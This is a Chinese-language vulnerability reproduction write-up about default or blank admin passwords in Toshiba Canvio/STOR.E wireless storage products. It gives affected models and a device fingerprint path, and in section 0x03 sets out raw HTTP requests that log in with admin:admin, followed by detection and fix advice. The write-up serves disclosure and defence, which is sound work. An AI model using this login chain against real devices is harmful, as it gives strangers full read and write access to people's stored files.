东芝Toshiba Canvio无线存储产品默认口令漏洞复现

Wayyt  5小时前

东芝Toshiba Canvio无线存储产品默认口令漏洞复现

0x00 漏洞概述

CANVIO(STOR.E)系列是东芝(Toshiba)面向个人与小型办公场景推出的无线存储产品,包括 Canvio AeroCast 无线移动硬盘以及多款无线适配器,设备内置 Web 管理界面用于配置与文件管理。东芝官方于 2018 年 2 月 28 日发布安全公告 TDSCSA00358,确认该系列无线产品存在默认口令问题:Canvio AeroCast(型号 HDTU110\*KWC1)出厂即设置了默认管理员口令,而无线适配器类产品(型号 HDWW100\*KW\*1)出厂口令为空。安全研究者验证发现,使用默认凭据 admin:admin 即可直接登录设备 Web 管理界面并完全控制设备。官方公告同时提示:即便用户日后修改了口令,执行设备复位或勾选固件升级后恢复出厂设置再升级固件,口令仍会被重置回默认值,风险具有持续性。

0x01 影响范围

依据东芝官方公告 TDSCSA00358,受影响产品与型号如下:

  • Canvio AeroCast / Canvio AeroCast wireless HDD,型号 HDTU110\*KWC1(出厂默认口令);
  • Canvio Wireless Adapter / STOR.E Wireless Adapter / Canvio CAST Wireless Adapter,型号 HDWW100\*KW\*1(出厂默认口令为空,口令功能未启用)。

威胁定性:处于设备无线通信范围内的攻击者,若知晓默认口令,可在无限制条件下访问产品上的整个共享文件系统;对无线适配器类产品,攻击者甚至无需口令即可访问。设备 Web 管理入口特征为路径 /sconfig/cgi/hook_login.php,页面源码含 Canvio 标识。

0x02 漏洞分析

该漏洞本质是设备出厂安全配置缺陷,而非代码层面的注入或逻辑错误。Web 管理界面(sconfig CGI 模块)在设备首次交付时即处于「默认口令」或「空口令」状态,且管理界面未强制用户在首次登录时修改口令(推断)。

研究者对登录流程进行梳理后发现,该登录页并非简单的用户名/密码表单:首页 HTML 中以 ja vasc ript 变量内嵌了会话参数,包括 var s = '...'(会话值)、var p = '...'(页面标识)以及 postParam.aCtIoN = '...'(动作名)。登录请求必须携带这三个从前置页面提取的参数,再附上用户名与口令字段提交至 /sconfig/cgi/hook_login.php。值得注意的是,用户名与口令字段名采用大小写混写形式(UsErNaMePaSsWoRD),这是设备端 CGI 的实际接收形式。由于服务端未对默认凭据做任何阻断或强制改密,admin:admin 这组凭据在出厂状态下始终有效,攻击者按正常登录流程提交即可登录成功。

0x03 利用链与请求包

完整利用链分三步:请求登录首页并提取会话参数、再次请求首页、使用默认凭据提交登录。以下请求包以研究者本地受控测试环境为例,Host 使用示意地址。

第一步,获取登录前置参数:

GET / HTTP/1.1
Host: 192.0.2.10

从响应体中提取三个值:var s = '...' 得到会话值,var p = '...' 得到页面标识,postParam.aCtIoN = '...' 得到动作名。

第二步,再次请求首页(不跟随跳转):

GET / HTTP/1.1
Host: 192.0.2.10

第三步,携带默认凭据提交登录:

POST /sconfig/cgi/hook_login.php HTTP/1.1
Host: 192.0.2.10
Content-Type: application/x-www-form-urlencoded

rn=6587864667441841&session={会话值}&pageid={页面标识}&aCtIoN={动作名}&UsErNaMe=admin&PaSsWoRD=admin

参数说明:

  • rn:随机数,用于规避缓存,示例见请求包中取值;
  • session / pageid / aCtIoN:均来自第一步从首页 HTML 提取的值;
  • UsErNaMe=adminPaSsWoRD=admin:设备默认凭据。

成功判定:响应状态码为 200,且响应体中出现 err 字样与 0(结合两项判断登录未被拒绝,即默认凭据有效,此判定方式属推断)。登录成功后,攻击者可查看设备信息、修改设备配置,并直接读写共享文件系统中的全部数据。

由于利用过程无需任何注入或绕过,仅需按正常流程使用出厂默认凭据登录,因此该利用链的成功率完全取决于目标是否仍保留默认口令——这也是检测与修复的核心着力点。

0x04 检测与修复建议

检测建议:

1. 排查办公环境与家庭网络中是否存在上述受影响型号的 Canvio/STOR.E 无线存储设备;

2. 对暴露 /sconfig/cgi/hook_login.php 路径的设备,可在受控环境下用默认凭据执行上述登录流程验证风险;

3. 审计无线网络内的未知接入设备,无线存储设备应默认视为敏感资产。

修复建议(综合官方公告与通行实践):

1. 首次使用立即修改默认口令并启用口令功能,新口令应包含大小写字母、数字与特殊字符,长度不少于 12 位;

2. 特别注意:设备复位或固件升级可能将口令重置回默认值,每次执行此类操作后必须重新核查并设置口令;

3. 禁止将管理界面暴露到公网,通过防火墙或访问控制列表限制管理入口来源;

4. 谨慎启用自定义工具等高权限功能,限制可执行代码的权限;

5. 启用操作日志审计,记录所有管理操作,定期检查账户使用情况。

0x05 参考资料

1. https://www.toshibastorage.com/news/pr/tdscsa00358-default-password-vulnerability-in-canvio-(stor.e)-wireless-products

2. https://toshiba-semicon-storage.com/cn/company/news/news-topics/2018/02/storage-20180228-1.html

最新评论

昵称
邮箱
提交评论